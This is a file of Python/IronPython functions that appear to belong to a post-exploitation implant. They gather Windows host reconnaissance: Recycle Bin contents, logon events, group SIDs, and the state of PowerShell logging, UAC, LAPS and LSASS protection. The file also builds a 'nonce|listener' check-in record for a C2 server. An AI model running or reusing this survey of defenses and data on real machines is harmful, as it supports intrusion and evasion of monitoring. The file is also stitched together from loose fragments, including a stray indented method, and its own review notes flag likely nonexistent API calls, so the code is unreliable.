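def recycleBin():
    """Summarise the ``$Recycle.Bin`` directory of every drive.

    Returns the report as one string headed ``RECYCLE BIN``.  When the
    current identity is in the Administrator role every per-user
    subdirectory is walked; otherwise only the subdirectory named after the
    current identity's owner SID string is read.  Drives or directories that
    raise ``IOError`` are skipped silently — the report is best-effort.
    """
    summary = printHeader("RECYCLE BIN")
    is_admin = WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(
        WindowsBuiltInRole.Administrator)
    if is_admin:
        for drive in DriveInfo.GetDrives():
            try:
                recycle_root = DirectoryInfo(drive.Name + "$Recycle.Bin\\")
                for user_dir in DirectoryInfo.EnumerateDirectories(recycle_root):
                    # Listing first: a failing GetFiles skips the subheader too.
                    entries = DirectoryInfo.GetFiles(user_dir)
                    summary += printSubheader("Directory: {0}".format(user_dir.FullName))
                    for entry in entries:
                        summary += _recycle_entry_line(entry.FullName)
            except IOError:
                pass
    else:
        owner = WindowsIdentity.GetCurrent().Owner.ToString()
        for drive in DriveInfo.GetDrives():
            try:
                user_dir = drive.Name + "$Recycle.Bin\\" + owner
                paths = Directory.GetFiles(user_dir)
                summary += printSubheader("Directory: {0}".format(user_dir))
                for path in paths:
                    summary += _recycle_entry_line(path)
            except IOError:
                pass

    return summary


def _recycle_entry_line(path):
    """Return one report line for a ``$I`` metadata file, or ``""`` otherwise.

    The line pairs the corresponding ``$R`` name (the ``$I`` prefix swapped
    for ``$R``) with every second byte of the metadata from offset 26 on.
    NOTE(review): that slice looks like a crude UTF-16LE-to-ASCII read of the
    stored original path — confirm against the ``$I`` layout of the Windows
    versions this is meant for.
    """
    name = path.split("\\")[-1]
    if not name.startswith("$I"):
        return ""
    # Close the handle deterministically instead of leaving it to the GC.
    with open(path, "r") as metadata:
        info = metadata.read()
    return "{0}\t{1}\n".format(name.replace("$I", "$R"), info[26::2])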
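def systemInfo():
    """Build the ``SYSTEM INFORMATION`` section of the report.

    Reads host, OS, session, PowerShell-logging policy and a handful of
    local security-policy values from the registry and the environment and
    returns them as one formatted string.  Every ``Registry.GetValue`` call
    passes a default, so a missing key or value is reported as that default
    (``"N/A"``, ``False`` ...) rather than raising.
    """
    # HKLM paths as raw strings: sequences such as "\S" or "\P" are not
    # escapes and must stay literal on every interpreter (the originals
    # relied on unknown escapes being kept verbatim).
    verInfo = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
    psKey = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine"
    sysPolKey = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"
    psPolicy = r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell"
    lapsKey = r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft Services\AdmPwd"
    lsaKey = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"
    tsKey = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"

    def row(width, label, value, gap="\n"):
        # One "label: value" line; `width` keeps a group's colons aligned.
        return "{0:<{1}}: {2}{3}".format(label, width, value, gap)

    def as_bool(value):
        # Convert.ToBoolean("N/A") raises FormatException; keep the marker
        # for a missing value instead of aborting the whole report.
        return value if value == "N/A" else Convert.ToBoolean(value)

    lines = [
        printHeader("SYSTEM INFORMATION"),
        row(10, "Host", Env.MachineName),
        row(10, "OS", "{0} {1}".format(
            Registry.GetValue(verInfo, "ProductName", "Windows"),
            Diagnostics.FileVersionInfo.GetVersionInfo(
                Env.SystemDirectory + "\\kernel32.dll").ProductVersion)),
        row(10, "64-Bit", Env.Is64BitOperatingSystem),
        row(10, "Date", DateTime.Now.ToString()),
        # Boot time: now minus the milliseconds elapsed since boot.
        row(10, "Uptime",
            DateTimeOffset(DateTime.Now).AddMilliseconds(-Env.TickCount).LocalDateTime,
            "\n\n"),

        row(14, "Username", "{0}\\{1}".format(Env.UserDomainName, Env.UserName)),
        row(14, "Logon Server", Env.GetEnvironmentVariable("LOGONSERVER"), "\n\n"),

        row(22, "PowerShell Version",
            Registry.GetValue(psKey, "PowerShellVersion", "N/A - Likely 2.0")),
        row(22, "PowerShell Compat",
            Registry.GetValue(psKey, "PSCompatibleVersion", "N/A - Likely 1.0, 2.0")),
        row(22, "PS Script Block Log",
            Registry.GetValue(psPolicy + r"\ScriptBlockLogging", "EnableScriptBlockLogging", "N/A")),
        row(22, "PS Transcription",
            Registry.GetValue(psPolicy + r"\Transcription", "EnableTranscripting", "N/A")),
        row(22, "PS Transcription Dir",
            Registry.GetValue(psPolicy + r"\Transcription", "OutputDirectory", "N/A")),
        row(22, "PS Module Logging",
            Registry.GetValue(psPolicy + r"\ModuleLogging", "EnableModuleLogging", "N/A"),
            "\n\n"),

        row(27, "UAC Enabled", as_bool(Registry.GetValue(sysPolKey, "EnableLUA", "N/A"))),
        row(27, "High Integrity",
            WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)),
        row(27, "UAC Token Filter Disabled", Registry.GetValue(sysPolKey, "LocalAccount", False)),
        row(27, "UAC Admin Filter Enabled", Registry.GetValue(sysPolKey, "FilterAdministratorToken", False)),
        row(27, "Local Admin Pass Solution", Registry.GetValue(lapsKey, "AdmPwdEnabled", "N/A")),
        row(27, "LSASS Protection", Registry.GetValue(lsaKey, "RunAsPPL", "N/A")),
        row(27, "Deny RDP Connections",
            as_bool(Registry.GetValue(tsKey, "FDenyTSConnections", "N/A"))),
    ]
    return "".join(lines)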
def userGroups():
    """Build the ``USER GROUPS`` section: one line per group SID of the current identity.

    Each line pairs the SID translated to its ``NTAccount`` name with the raw
    SID.  NOTE(review): ``Translate`` raises for a SID that has no account
    mapping any more; nothing here catches that — confirm whether such SIDs
    should be skipped instead.
    """
    header = printHeader("USER GROUPS")
    identity = WindowsIdentity.GetCurrent()
    rows = [
        "{0:<35}: {1}\n".format(SecurityIdentifier(sid.ToString()).Translate(NTAccount), sid)
        for sid in identity.Groups
    ]
    return header + "".join(rows)
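def logonEvents():
    """Build the ``LOGON EVENTS`` section from the Security event log.

    The log is only read when the current identity is in the Administrator
    role; otherwise the section carries just a "Not administrator!" note.
    Reports the first ten entries whose instance id is 4624 (Windows'
    successful-logon audit event), each trimmed at the explanatory text that
    starts with "This event is generated".
    """
    from itertools import islice

    summary = printHeader("LOGON EVENTS")
    is_admin = WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(
        WindowsBuiltInRole.Administrator)
    if not is_admin:
        return summary + "\nNot administrator!\n"

    sec = EventLog("Security")
    # Generator + islice: stop scanning the (potentially very large) log
    # after the tenth match instead of materialising every 4624 entry.
    logons = (event for event in sec.Entries if event.InstanceId == 4624)
    # NOTE(review): EventLog.Entries is ordered oldest-first, so these are
    # the ten oldest matching entries still retained — confirm intent.
    for logon in islice(logons, 10):
        text = logon.Message
        idx = text.IndexOf("This event is generated")
        # IndexOf returns -1 when the marker is absent; Remove(-1) would throw.
        message = text.Remove(idx) if idx >= 0 else text
        summary += printSubheader("Time Created: {0}".format(logon.TimeGenerated.ToString()))
        summary += message

    return summary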
 def is_high_integrity(self):
     """Return True when the current Windows identity is in the Administrator role.

     Reads no instance state; ``self`` is unused.
     """
     current_user = WindowsIdentity.GetCurrent()
     return WindowsPrincipal(current_user).IsInRole(WindowsBuiltInRole.Administrator)
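def get_sysinfo(nonce='00000000'):
    """Collect host, user and process facts as one ``|``-separated record.

    Field order of the returned string:
    ``nonce | listener | domainname | username | hostname | internal_ip |
    os_details | high_integrity | process_name | process_id | language |
    language_version | architecture``

    ``listener`` is read from the module-level global ``server``, which must
    be set before calling; ``domainname`` is always sent empty.  Every probe
    is best-effort: one that raises contributes the ``[FAILED QUERY]`` marker
    instead of aborting the record.  Under IronPython the .NET
    ``Environment``/``WindowsIdentity``/``Process`` classes are used,
    elsewhere the POSIX facilities.
    """
    failed = '[FAILED QUERY]'
    # Evaluated once; every probe below branches on it.
    on_ironpython = platform.python_implementation() == 'IronPython'

    try:
        if on_ironpython:
            username = Environment.UserName
        else:
            username = pwd.getpwuid(os.getuid())[0].strip("\\")
    except Exception:
        username = failed

    try:
        if on_ironpython:
            # NOTE(review): as far as I can tell SecurityIdentifier exposes
            # GetBinaryForm(), not ToByteArray(); if this raises, uid becomes
            # the failure marker — confirm.
            uid = WindowsIdentity.GetCurrent().User.ToByteArray()
        else:
            # Same value `id -u` prints, without spawning a shell.
            uid = str(os.getuid())
    except Exception:
        uid = failed

    try:
        if on_ironpython:
            highIntegrity = WindowsPrincipal(
                WindowsIdentity.GetCurrent()).IsInRole(
                    WindowsBuiltInRole.Administrator)
        else:
            # uid 0 is root.  A plain bool formats as "True"/"False",
            # exactly like the original's mixed "True"/False values.
            highIntegrity = uid == "0"
    except Exception:
        highIntegrity = failed

    # os.uname() exists only on POSIX.  Keep its result apart from the
    # failure marker so hostname/os_details never index into that string.
    uname = None
    if not on_ironpython:
        try:
            uname = os.uname()
        except Exception:
            uname = None

    try:
        if on_ironpython:
            hostname = Environment.MachineName
        elif uname is not None:
            hostname = uname[1]
        else:
            hostname = failed
    except Exception:
        hostname = failed

    try:
        internalIP = socket.gethostbyname(socket.gethostname())
    except Exception:
        # Fallback when the hostname does not resolve: scrape ifconfig.
        try:
            with os.popen(
                "ifconfig|grep inet|grep inet6 -v|grep -v 127.0.0.1|cut -d' ' -f2"
            ) as pipe:
                internalIP = pipe.read()
        except Exception:
            internalIP = failed

    try:
        if on_ironpython:
            # NOTE(review): OperatingSystem has no ToByteArray() that I can
            # find; if this raises, os_details becomes the failure marker —
            # confirm whether ToString() was intended.
            osDetails = Environment.OSVersion.ToByteArray()
        elif uname is not None:
            osDetails = ",".join(uname)
        else:
            osDetails = failed
    except Exception:
        osDetails = failed

    try:
        processID = Process.GetCurrentProcess().Id if on_ironpython else os.getpid()
    except Exception:
        processID = failed

    try:
        pyVersion = "%s.%s" % (sys.version_info[0], sys.version_info[1])
    except Exception:
        pyVersion = failed

    try:
        architecture = platform.machine()
    except Exception:
        architecture = failed

    if on_ironpython:
        language = 'ironpython'
        # NOTE(review): this is the Process object, not its ProcessName, so
        # the field formats via ToString() — confirm that is intended.
        processName = Process.GetCurrentProcess()
    else:
        language = 'python'
        processName = _ps_command_name(os.getpid())

    return "%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s" % (
        nonce, server, '', username, hostname, internalIP, osDetails,
        highIntegrity, processName, processID, language, pyVersion,
        architecture)


def _ps_command_name(pid):
    """Return the COMMAND column of ``ps <pid>``, or ``'python'`` if unavailable.

    Runs ``ps`` with an argument list rather than a shell string; the only
    argument is the integer pid, so nothing needs shell parsing.
    """
    try:
        ps = subprocess.Popen(['ps', str(pid)],
                              stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE)
        out, _ = ps.communicate()
    except OSError:
        # ps missing or not executable: the shell=True original produced
        # empty output here, which mapped to the same fallback.
        return 'python'
    parts = out.split(b"\n")
    # Row 0 is the ps header; columns 4 onward of row 1 hold the command.
    if len(parts) > 2:
        return b" ".join(parts[1].split()[4:]).decode('UTF-8')
    return 'python'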
def IsHighIntegrity():
    """Return whether the current Windows identity is in the built-in Administrator role."""
    admin_role = WindowsBuiltInRole.Administrator
    return WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(admin_role)